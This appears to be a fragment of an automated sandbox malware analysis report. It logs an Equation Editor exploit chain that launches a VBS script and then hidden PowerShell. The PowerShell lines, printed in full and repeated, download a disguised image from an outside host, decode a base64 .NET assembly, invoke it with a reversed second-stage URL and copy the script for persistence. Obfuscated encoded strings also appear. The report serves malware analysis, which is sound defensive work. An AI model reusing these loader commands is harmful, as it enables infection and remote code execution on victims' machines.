TreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'c:\programdata\' , 'word','addinprocess32',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'c:\programdata\' , 'word','addinprocess32',''))} }" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs